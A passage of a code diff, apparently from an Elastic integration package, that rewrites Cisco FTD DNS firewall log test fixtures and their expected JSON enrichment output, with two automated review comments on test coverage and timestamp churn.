ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 205.251.196.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, 
AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 9.9.9.9, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, 
ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 53033, DstPort: 
53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59 -2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, 
DstIP: 8.8.8.8, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: 
AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55371, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 97, ResponderBytes: 200, NAPPolicy: Balanced Security and Connectivity, DNSQuery: www.elastic.co, DNSRecordType: a host address, DNS_TTL: 12 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 60441, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 
Address, DNS_TTL: 299, DNSResponseType: No error +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, 
InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication 
Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter 
Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: 
input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: 
inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59 +2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299 diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log-expected.json index babcde741ed..67caf248680 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-dns.log-expected.json 
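Review bot: Every DstIP in the rewritten fixture is now the same 81.2.69.144, where the old file spread its queries across three distinct resolvers (8.8.8.8, 9.9.9.9 and 205.251.196.144), so the destination geo/AS enrichment and the `related.ip` collection are only ever checked against a single lookup result. Keeping at least one line on a second address from the same supported documentation set would preserve the multi-destination coverage the fixture used to have; the `DNSQuery: refusedthis.com` / `DNSResponseType: Query Refused` line is a natural candidate, since it already pointed at a different resolver before this change. The corresponding entries in test-dns.log-expected.json would then need regenerating for those lines only. The expected-output hunks elsewhere in this chunk are generated from this input and need no separate review.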
@@ -13,24 +13,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 145,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -78,7 +81,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -87,8 +90,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-07-19T09:06:44.351787667Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70",
+ "ingested": "2021-12-09T13:32:56.096896200Z",
+ "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57379, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 145, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: a host address, DNS_TTL: 70",
 "code": "430003",
 "kind": "event",
 "start": "2019-08-26T23:11:03.000Z",
@@ -118,7 +121,7 @@
 "dns_query": "elastic.co",
 "access_control_rule_action": "Allow",
 "nap_policy": "Balanced Security and Connectivity",
- "dst_ip": "8.8.8.8",
+ "dst_ip": "81.2.69.144",
 "ac_policy": "default",
 "src_ip": "10.0.1.20",
 "protocol": "udp",
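Review bot: Every `event` hunk in this file, starting with `@@ -87,8 +90,8 @@` here and repeated at each later `event` block through `@@ -1847,8 +1883,8 @@`, rewrites `"ingested"` from the 2021-07-19 regeneration to 2021-12-09 even though the IP swap does not touch that field, so this golden file churns on every regeneration. That noise buries the substantive change (`DstIP` in `original` and the `dst_ip`/`destination.*` values) and will keep producing spurious diffs for whoever regenerates next. If the package's pipeline test config supports it, marking the field as dynamic, `dynamic_fields:` / `  event.ingested: ".*"`, lets the comparison ignore the value; failing that, dropping `event.ingested` from the expected documents removes the churn. The `original` lines themselves look consistent with the new log input.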
@@ -159,24 +162,27 @@
 },
 "destination": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 15169,
+ "number": 20712,
 "organization": {
- "name": "Google LLC"
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
- "address": "8.8.8.8",
+ "address": "81.2.69.144",
 "port": 53,
 "bytes": 193,
- "ip": "8.8.8.8",
+ "ip": "81.2.69.144",
 "packets": 1
 },
 "source": {
@@ -224,7 +230,7 @@
 ],
 "ip": [
 "10.0.1.20",
- "8.8.8.8"
+ "81.2.69.144"
 ]
 },
 "host": {
@@ -233,8 +239,8 @@
 "event": {
 "severity": 1,
 "duration": 0,
- "ingested": "2021-07-19T09:06:44.351793065Z",
- "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 51389, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 193, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: IP6 Address, DNS_TTL: 299",
+ "ingested": "2021-12-09T13:32:56.096900400Z",
